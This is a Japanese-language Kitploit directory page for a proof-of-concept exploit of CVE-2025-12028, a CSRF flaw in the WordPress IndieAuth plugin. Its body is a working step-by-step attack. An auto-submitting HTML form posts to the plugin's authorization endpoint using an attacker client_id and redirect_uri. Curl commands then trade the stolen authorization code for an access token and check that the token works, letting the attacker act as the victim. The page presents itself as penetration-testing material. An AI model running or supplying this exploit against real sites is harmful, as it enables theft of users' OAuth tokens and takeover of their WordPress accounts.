Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-12028 — CVE-2025-12028の概念実証エクスプロイトで、WordPress IndieAuthプラグインにおけるCSRFベースのOAuthトークン窃取を実証し、盗まれた認証情報による不正なAPIアクセスを可能にします。 | Kitploit
ツール/GitHubGitHub/jfriedli/cve-2025-12028
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証
GitHubjfriedli/cve-2025-12028

CVE-2025-12028

CVE-2025-12028の概念実証エクスプロイトで、WordPress IndieAuthプラグインにおけるCSRFベースのOAuthトークン窃取を実証し、盗まれた認証情報による不正なAPIアクセスを可能にします。

リポジトリを見る
15ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

1) シンプルなHTTPサーバーを起動して、概念実証ページをホストする

root@kitploit:~
mkdir -p /tmp/attacker && cd /tmp/attacker
php -S 127.0.0.1:8000

2) 以下の内容でファイル /tmp/attacker/poc.html を作成する

root@kitploit:~
<!doctype html>
<html>
  <body>
    <form id="x" method="post" action="http://localhost/wordpress/wp-login.php?action=indieauth">
      <input name="client_id" value="http://attacker.local/app">
      <input name="redirect_uri" value="http://127.0.0.1:8000/cb">
      <input name="state" value="csrf-12345">
      <input name="response_type" value="code">
      <input name="scope[]" value="create">
      <input name="scope[]" value="update">
      <input name="scope[]" value="delete">
    </form>
    <script>
      document.getElementById('x').submit();
    </script>
  </body>
</html>

3) ログイン中のブラウザセッションでPoCをトリガーする

以下にログインした状態で:

root@kitploit:~
http://localhost/wordpress

次を開く:

root@kitploit:~
http://127.0.0.1:8000/poc.html

同じブラウザセッションで。


4) 認可リダイレクトを確認する

ブラウザは次の処理を行います:

  • 被害者のクッキーを使用してIndieAuthエンドポイントにPOSTする
  • 認可コードを受信する
  • 次のURLにリダイレクトされる:
root@kitploit:~
http://127.0.0.1:8000/cb?code=...&state=csrf-12345

5) コードをアクセストークンと交換する

root@kitploit:~
curl -sX POST "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -d "grant_type=authorization_code" \
  -d "code=PASTE_CODE_FROM_STEP_4" \
  -d "client_id=http://attacker.local/app" \
  -d "redirect_uri=http://127.0.0.1:8000/cb"

6) トークンレスポンスを確認する

JSONレスポンスには以下のようなフィールドが含まれます:

  • access_token
  • scope
  • me *(場合により)refresh_token

このトークンを使用して、許可されたスコープ内で被害者として行動できるようになります。


7) トークンを検証する

root@kitploit:~
TOKEN="PASTE_ACCESS_TOKEN"

curl -s "http://localhost/wordpress/wp-json/indieauth/1.0/token" \
  -H "Authorization: Bearer $TOKEN"
ツールをダウンロード